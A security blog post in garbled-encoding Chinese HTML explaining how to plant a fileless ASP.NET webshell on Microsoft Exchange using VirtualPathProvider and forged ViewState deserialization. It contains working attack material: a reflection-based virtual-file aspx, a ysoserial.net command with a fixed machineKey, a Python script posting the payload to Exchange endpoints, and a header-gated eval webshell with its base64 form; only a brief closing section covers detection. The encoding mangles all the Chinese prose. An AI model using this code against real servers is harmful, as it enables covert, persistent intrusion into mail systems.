I"º5<h2 id="0x00-å‰è¨€">0x00 å‰è¨€</h2>
<hr />

<p>é€šè¿‡ASP.NETçš„VirtualPathProviderç±»èƒ½å¤Ÿåˆ›å»ºè™šæ‹Ÿæ–‡ä»¶ï¼Œå®ç°ä»¥ä¸‹æ•ˆæœï¼šè™šæ‹Ÿæ–‡ä»¶ä¸å­˜åœ¨äºæœåŠ¡å™¨çš„æ–‡ä»¶ç³»ç»Ÿï¼Œä½†æ˜¯èƒ½å¤Ÿå¯¹å…¶åŠ¨æ€ç¼–è¯‘å¹¶æä¾›è®¿é—®æœåŠ¡ã€‚<a href="https://github.com/pwntester/ysoserial.net">ysoserial.net</a>çš„<a href="https://github.com/pwntester/ysoserial.net/blob/master/ExploitClass/GhostWebShell.cs">GhostWebShell.cs</a>æä¾›äº†ä¸€ç§å¯ä¾›å­¦ä¹ çš„åˆ©ç”¨æ€è·¯ã€‚</p>

<p>æœ¬æ–‡å°†è¦ä»‹ç»è™šæ‹Ÿæ–‡ä»¶çš„åˆ©ç”¨æ–¹æ³•ï¼Œåœ¨<a href="https://github.com/pwntester/ysoserial.net">ysoserial.net</a>çš„<a href="https://github.com/pwntester/ysoserial.net/blob/master/ExploitClass/GhostWebShell.cs">GhostWebShell.cs</a>åŸºç¡€ä¸Šä»‹ç»Exchangeä¸‹çš„åˆ©ç”¨æ–¹æ³•ï¼Œå¼€æºä»£ç ï¼Œè®°å½•ç»†èŠ‚ï¼Œç»™å‡ºé˜²å¾¡å»ºè®®ã€‚</p>

<h2 id="0x01-ç®€ä»‹">0x01 ç®€ä»‹</h2>
<hr />

<p>æœ¬æ–‡å°†è¦ä»‹ç»ä»¥ä¸‹å†…å®¹ï¼š</p>

<ul>
  <li>VirtualPathProvideråœ¨Exchangeä¸‹çš„åˆ©ç”¨</li>
  <li>DotNetååºåˆ—åŒ–åœ¨Exchangeä¸‹çš„åˆ©ç”¨</li>
  <li>é˜²å¾¡æ£€æµ‹</li>
</ul>

<h2 id="0x02-virtualpathprovideråœ¨exchangeä¸‹çš„åˆ©ç”¨">0x02 VirtualPathProvideråœ¨Exchangeä¸‹çš„åˆ©ç”¨</h2>
<hr />

<p>å‚è€ƒèµ„æ–™ï¼š</p>

<p>https://docs.microsoft.com/en-us/dotnet/api/system.web.hosting.virtualpathprovider?view=netframework-4.8</p>

<p>åœ¨å®ç°ä¸Šéœ€è¦ç»§æ‰¿VirtualPathProviderç±»å¹¶é‡å†™ä¸¤ä¸ªæ–¹æ³•ï¼šFileExistså’ŒGetFileï¼Œæ³¨å†ŒVirtualPathProviderå¹¶åˆ›å»ºå®ä¾‹åï¼Œå®ç°è™šæ‹Ÿæ–‡ä»¶çš„åˆ›å»º</p>

<p>ç¤ºä¾‹ä»£ç ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>&lt;%@ Page Language="C#" AutoEventWireup="true" validateRequest="false" EnableViewStateMac="false" %&gt;
&lt;%@ Import Namespace="System.Web.Hosting" %&gt;
&lt;%@ Import Namespace="System.Web.Compilation" %&gt;
&lt;%@ Import Namespace="System.IO" %&gt;
&lt;%@ Import Namespace="System.Reflection" %&gt;
&lt;%@ Import Namespace="System.Security.Cryptography" %&gt;
&lt;script runat="server"&gt;

    public class DeferredPathProvider : VirtualPathProvider
    {
        public DeferredPathProvider() : base()
        {
        }

        public bool IsTargetVirtualPath(string virtualPath)
        {
            string path = VirtualPathUtility.ToAppRelative(virtualPath);
            return path.StartsWith("~/deferred", StringComparison.InvariantCultureIgnoreCase);
        }

        public override VirtualFile GetFile(string virtualPath)
        {
            if (IsTargetVirtualPath(virtualPath))
            {
                return new DeferredVirtualFile(this, virtualPath);
            }
            else
            {
                return Previous.GetFile(virtualPath);
            }
        }

        public override bool FileExists(string virtualPath)
        {
            return IsTargetVirtualPath(virtualPath) ? true : Previous.FileExists(virtualPath);
        }
    }

    public class DeferredVirtualFile : VirtualFile
    {
        DeferredPathProvider provider = null;

        public DeferredVirtualFile(DeferredPathProvider provider, string virtualFile) : base(virtualFile)
        {
            this.provider = provider;
        }

        public override Stream Open()
        {
        Stream stream = new MemoryStream();

        StreamWriter writer = new StreamWriter(stream);
        writer.Write("&lt;%@ Page Language=\"C#\" AutoEventWireup=\"true\" %&gt;\r\n" +
            "&lt;% Response.Write(\"Compiled on the fly :)\"); %&gt;");
        writer.Flush();
        stream.Seek(0, SeekOrigin.Begin);

        return stream;
        }
    }

    private Page handler = null;
    public void Page_Load()
    {
        DeferredPathProvider provider = new DeferredPathProvider();
        typeof(HostingEnvironment).GetMethod("RegisterVirtualPathProviderInternal",
        BindingFlags.Static | BindingFlags.InvokeMethod | BindingFlags.NonPublic)
        .Invoke(null, new object[] { provider });
        
        handler = (Page) BuildManager.CreateInstanceFromVirtualPath("~/deferred.aspx", typeof(Page));
        handler.ProcessRequest(HttpContext.Current);
    }

    protected override void Render(HtmlTextWriter writer)
    {
    }
&lt;/script&gt;
</code></pre></div></div>

<p><strong>æ³¨ï¼š</strong></p>

<p>ä»£ç æ¥è‡ªhttps://kernel32.org/posts/evading-anti-virus-by-using-dynamic-code-generation-and-reflection/</p>

<p>åœ¨Exchangeä¸Šè¿›è¡Œå¦‚ä¸‹æµ‹è¯•ï¼š</p>

<p>ä¿å­˜ä½ç½®ï¼š<code class="language-plaintext highlighter-rouge">%ExchangeInstallPath%\FrontEnd\HttpProxy\owa\auth\test1.aspx</code></p>

<p>è®¿é—®url:<code class="language-plaintext highlighter-rouge">https://&lt;url&gt;/owa/auth/test1.aspx/deferred.aspx</code>ï¼Œè¿”å›ç»“æœ:<code class="language-plaintext highlighter-rouge">Compiled on the fly :)</code>ï¼Œè™šæ‹Ÿæ–‡ä»¶è¢«æˆåŠŸè®¿é—®</p>

<p><strong>æ³¨ï¼š</strong></p>

<p>è™šæ‹Ÿæ–‡ä»¶çš„å¯è®¿é—®è·¯å¾„ä¸º:<code class="language-plaintext highlighter-rouge">https://&lt;url&gt;/owa/auth/test1.aspx/&lt;ä»»æ„å­—ç¬¦&gt;</code></p>

<p>åˆ›å»ºè™šæ‹Ÿæ–‡ä»¶æ—¶ï¼Œä¼šåœ¨ä¸´æ—¶ç›®å½•ä¸‹äº§ç”Ÿç¼–è¯‘æ–‡ä»¶ï¼Œé»˜è®¤ä½ç½®ï¼š<code class="language-plaintext highlighter-rouge">C:\Windows\Microsoft.NET\Framework64|Framework\&lt;version&gt;\Temporary ASP.NET Files\owa\&lt;hash1&gt;\&lt;hash2&gt;\</code></p>

<p>æ–‡ä»¶åç§°ï¼š<code class="language-plaintext highlighter-rouge">test1.aspx.&lt;hash3&gt;.compiled</code></p>

<p>å¦‚æœåˆ é™¤åŸæ–‡ä»¶test1.aspxï¼Œé‚£ä¹ˆè™šæ‹Ÿæ–‡ä»¶ä¹Ÿéšä¹‹å¤±æ•ˆï¼Œæ— æ³•è®¿é—®</p>

<p>é€šè¿‡è¿™ç§æ–¹å¼å®ç°çš„Webshellï¼Œè™½ç„¶èƒ½å¤Ÿéšè—çœŸå®çš„æ–‡ä»¶å†…å®¹ï¼Œä½†æ˜¯éœ€è¦ä¾èµ–æ–‡ä»¶ï¼Œå®¹æ˜“è¢«æ¸…é™¤ï¼Œéšè”½æ€§ä¸å¤Ÿ</p>

<p>è€Œåˆ©ç”¨<a href="https://github.com/pwntester/ysoserial.net">ysoserial.net</a>çš„<a href="https://github.com/pwntester/ysoserial.net/blob/master/ExploitClass/GhostWebShell.cs">GhostWebShell.cs</a>æ°æ°èƒ½å¤Ÿè§£å†³è¿™ä¸ªé—®é¢˜ï¼Œæé«˜éšè”½æ€§ã€‚</p>

<h2 id="0x03-dotnetååºåˆ—åŒ–çš„åˆ©ç”¨">0x03 DotNetååºåˆ—åŒ–çš„åˆ©ç”¨</h2>
<hr />

<p>å‚è€ƒä»£ç ï¼š</p>

<p>https://github.com/pwntester/ysoserial.net/blob/master/ExploitClass/GhostWebShell.cs</p>

<p>æµ‹è¯•ç¯å¢ƒï¼š</p>

<p>è·å¾—äº†Exchangeæ–‡ä»¶è¯»å†™æƒé™ï¼Œèƒ½å¤Ÿä¿®æ”¹<code class="language-plaintext highlighter-rouge">%ExchangeInstallPath%\FrontEnd\HttpProxy\owa\web.config</code>å’Œ<code class="language-plaintext highlighter-rouge">%ExchangeInstallPath%\FrontEnd\HttpProxy\ecp\web.config</code>ï¼Œè®¾ç½®machineKeyçš„å†…å®¹å¦‚ä¸‹ï¼š</p>

<p><code class="language-plaintext highlighter-rouge">&lt;machineKey validationKey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF" decryptionKey="E9D2490BD0075B51D1BA5288514514AF" validation="SHA1" decryption="3DES" /&gt;</code></p>

<p>å¯¹äºè¿™ä¸¤ä¸ªä½ç½®çš„.Netååºåˆ—åŒ–å‘½ä»¤æ‰§è¡Œï¼Œä¸å†éœ€è¦åˆæ³•ç”¨æˆ·çš„å‡­æ®</p>

<p>è¿™é‡Œé€‰æ‹©<code class="language-plaintext highlighter-rouge">%ExchangeInstallPath%\FrontEnd\HttpProxy\owa\auth\errorFE.aspx</code>ï¼Œå¯¹åº”çš„generatorä¸º<code class="language-plaintext highlighter-rouge">042A94E8</code></p>

<p>ä½¿ç”¨<a href="https://github.com/pwntester/ysoserial.net">ysoserial.net</a>ç”ŸæˆViewStateçš„å‚æ•°å¦‚ä¸‹ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ysoserial.exe -p ViewState -g ActivitySurrogateSelectorFromFile -f LosFormatter -c "ghostfile.cs;System.Web.dll;System.dll;" --validationalg="SHA1" --validationkey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF" --generator="042A94E8"
</code></pre></div></div>

<p>ä½¿ç”¨å¦‚ä¸‹ä»£ç å‘é€ViewStateï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code># encoding: UTF-8
import requests
import re
import sys
import os
import json
import urllib3
urllib3.disable_warnings()

from urllib.parse import quote
import urllib.parse

if __name__ == '__main__':
    if len(sys.argv)!=4:
        note = '''
Usage:
    &lt;url&gt; &lt;key&gt; &lt;path&gt;
&lt;path&gt;: owa or ecp

eg.    
    {0} 192.168.1.1 CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF owa
    {1} mail.test.com CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF ecp    
        '''
        print(note.format(sys.argv[0],sys.argv[0]))
        sys.exit(0)
    else:
        targeturl = "";
        generator = ""; 
        try:
            if sys.argv[3] == "owa":
                targeturl = "https://" + sys.argv[1] + "/owa/auth/errorFE.aspx";
                generator = "042A94E8";

            elif sys.argv[3] == "ecp":
                targeturl = "https://" + sys.argv[1] + "/ecp/auth/TimeoutLogout.aspx";
                generator = "277B1C2A";
            else:
                print("[!] Wrong input");

            print("[*] TargetURL: " + targeturl)

            out_payload = "&lt;ViewState Data&gt;"

            body = {"__VIEWSTATEGENERATOR": generator,"__VIEWSTATE": out_payload}
            postData = urllib.parse.urlencode(body).encode("utf-8")

            headers = {
                "User-Agent": "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36xxxxx",
                "Content-Type":"application/x-www-form-urlencoded"
            } 
            status = requests.post(url=targeturl, headers=headers, data=postData, verify=False, timeout=15)

            print(status.status_code)
            print(status.headers)
            print(status.text) 

        except Exception as e:
            print("[!] Error:%s"%(e))
            exit(0)
</code></pre></div></div>

<p>è®¿é—®<code class="language-plaintext highlighter-rouge">https://&lt;url&gt;/owa/auth/fakepath31337/&lt;ä»»æ„å­—ç¬¦&gt;.aspx</code>ï¼Œè¿”å›ç»“æœ:<code class="language-plaintext highlighter-rouge">This is the attacker's file - running on the server if this 1337 is 1337.</code>ï¼Œè™šæ‹Ÿæ–‡ä»¶è¢«æˆåŠŸè®¿é—®</p>

<p>è¿™ç§æ–¹å¼ä¸éœ€è¦ä¾èµ–æ–‡ä»¶ï¼Œæé«˜éšè”½æ€§</p>

<p>æ¥ä¸‹æ¥ä¿®æ”¹<a href="https://github.com/pwntester/ysoserial.net/blob/master/ExploitClass/GhostWebShell.cs">GhostWebShell.cs</a>å®ç°Webshellçš„åŠŸèƒ½</p>

<p>å°†è™šæ‹Ÿç›®å½•è®¾ç½®ä¸ºæ ¹ç›®å½•ï¼Œè®¿é—®çš„urlç¤ºä¾‹ï¼š<code class="language-plaintext highlighter-rouge">https://&lt;url&gt;/owa/auth/&lt;ä»»æ„å­—ç¬¦&gt;.aspx</code></p>

<p>ä¸ºäº†é¿å…æ„å¤–è®¿é—®ï¼Œéœ€è¦æ·»åŠ è®¿é—®æ¡ä»¶ï¼Œå¡«å…¥Headeråˆ¤æ–­ï¼Œå¦‚æœä¸æ»¡è¶³æ¡ä»¶è·³è½¬è‡³é”™è¯¯é¡µé¢<code class="language-plaintext highlighter-rouge">errorFE.aspx</code></p>

<p>ä¸€å¥è¯çš„æµ‹è¯•ä»£ç ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>&lt;%@ Page Language="Jscript"%&gt;&lt;%
if(Request.Headers["Value"]=="00HGAT3K0AXHV2RF2W0G")
{
eval(Request.Item["antsword"],"unsafe");	
}
else
{
Response.Redirect("/owa/auth/errorFE.aspx?httpCode=404");
}
%&gt;
</code></pre></div></div>

<p>ä½¿ç”¨AntSwordè¿æ¥æ—¶ï¼Œéœ€è¦è®¾ç½®HTTP HEADERSï¼Œå†…å®¹å¦‚ä¸‹ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Name:  Value
Value: 00HGAT3K0AXHV2RF2W0G
</code></pre></div></div>

<p>Base64åçš„å­—ç¬¦ä¸ºï¼š<code class="language-plaintext highlighter-rouge">PCVAIFBhZ2UgTGFuZ3VhZ2U9IkpzY3JpcHQiJT48JQppZihSZXF1ZXN0LkhlYWRlcnNbIlZhbHVlIl09PSIwMEhHQVQzSzBBWEhWMlJGMlcwRyIpCnsKZXZhbChSZXF1ZXN0Lkl0ZW1bImFudHN3b3JkIl0sInVuc2FmZSIpOwkKfQplbHNlCnsKUmVzcG9uc2UuUmVkaXJlY3QoIi9vd2EvYXV0aC9lcnJvckZFLmFzcHg/aHR0cENvZGU9NDA0Iik7Cn0KJT4=</code></p>

<p>æ›¿æ¢<a href="https://github.com/pwntester/ysoserial.net/blob/master/ExploitClass/GhostWebShell.cs">GhostWebShell.cs</a>ä¸­çš„<code class="language-plaintext highlighter-rouge">webshellContentsBase64</code></p>

<p>å®Œæ•´çš„Pythonå®ç°ä»£ç å·²ä¸Šä¼ è‡³githubï¼Œåœ°å€å¦‚ä¸‹ï¼š</p>

<p>https://github.com/3gstudent/Homework-of-Python/blob/master/ExchangeDeserializeShell-NoAuth-ghostfile.py</p>

<p>ä»£ç æ”¯æŒä¸¤ä¸ªä½ç½®çš„ååºåˆ—åŒ–æ‰§è¡Œï¼Œåˆ†åˆ«ä¸ºé»˜è®¤å­˜åœ¨çš„æ–‡ä»¶<code class="language-plaintext highlighter-rouge">%ExchangeInstallPath%\FrontEnd\HttpProxy\owa\auth\errorFE.aspx</code>å’Œ<code class="language-plaintext highlighter-rouge">%ExchangeInstallPath%\FrontEnd\HttpProxy\ecp\auth\TimeoutLogout.aspx</code>ï¼Œèƒ½å¤Ÿè‡ªåŠ¨ç”Ÿæˆå¸¦æœ‰WebshellåŠŸèƒ½çš„GhostWebShell.csï¼Œä½¿ç”¨<a href="https://github.com/pwntester/ysoserial.net">ysoserial.net</a>ç”ŸæˆViewStateå¹¶å‘é€</p>

<p>å®Œæ•´çš„C#å®ç°ä»£ç å·²ä¸Šä¼ è‡³githubï¼Œåœ°å€å¦‚ä¸‹ï¼š</p>

<p>https://github.com/3gstudent/Homework-of-C-Sharp/blob/master/SharpExchangeDeserializeShell-NoAuth-ghostfile.cs</p>

<p>ä»£ç åŠŸèƒ½åŒä¸Šï¼Œå¯ç›´æ¥ç¼–è¯‘å¹¶æ‰§è¡Œï¼Œä¸å†ä¾èµ–<a href="https://github.com/pwntester/ysoserial.net">ysoserial.net</a></p>

<p><strong>æ³¨ï¼š</strong></p>

<p>ä¸ºäº†ä¾¿äºåœ¨Exchangeä¸‹è¿›è¡Œæµ‹è¯•ï¼Œæˆ‘å°†<a href="https://github.com/pwntester/ysoserial.net/blob/master/ExploitClass/GhostWebShell.cs">GhostWebShell.cs</a>ä¿®æ”¹æˆäº†aspxæ–‡ä»¶ï¼Œå¯ä»¥ç›´æ¥è®¿é—®è¿›è¡Œæµ‹è¯•ï¼Œä»£ç åœ°å€å¦‚ä¸‹ï¼š</p>

<p>https://github.com/3gstudent/test/blob/master/PageLoad_ghostfile.aspx</p>

<h2 id="0x04-é˜²å¾¡æ£€æµ‹">0x04 é˜²å¾¡æ£€æµ‹</h2>
<hr />

<p>åˆ©ç”¨è™šæ‹Ÿæ–‡ä»¶åˆ›å»ºçš„ASP.NET Webshellï¼Œä¸å†éœ€è¦å†™å…¥aspxæ–‡ä»¶ï¼Œåœ¨é˜²å¾¡ä¸Šå¯ç›‘æ§ä¸´æ—¶ç›®å½•ä¸‹äº§ç”Ÿçš„ç¼–è¯‘æ–‡ä»¶ï¼Œé»˜è®¤ä½ç½®ï¼š<code class="language-plaintext highlighter-rouge">C:\Windows\Microsoft.NET\Framework64|Framework\&lt;version&gt;\Temporary ASP.NET Files\owa\&lt;hash1&gt;\&lt;hash2&gt;\</code></p>

<p>éœ€è¦æ³¨æ„çš„æ˜¯æ”»å‡»è€…åœ¨äº§ç”Ÿç¼–è¯‘æ–‡ä»¶åå¯ä»¥è¿›è¡Œåˆ é™¤</p>

<h2 id="0x05-å°ç»“">0x05 å°ç»“</h2>
<hr />

<p>æœ¬æ–‡ä»‹ç»äº†è™šæ‹Ÿæ–‡ä»¶çš„åˆ©ç”¨æ–¹æ³•ï¼Œé’ˆå¯¹Exchangeç¯å¢ƒï¼Œåˆ†åˆ«ä»‹ç»äº†VirtualPathProviderå’ŒDotNetååºåˆ—åŒ–çš„åˆ©ç”¨ï¼Œç»™å‡ºé˜²å¾¡å»ºè®®ã€‚</p>

<hr />

<p><a href="https://github.com/3gstudent/feedback/issues/new">LEAVE A REPLY</a></p>

:ET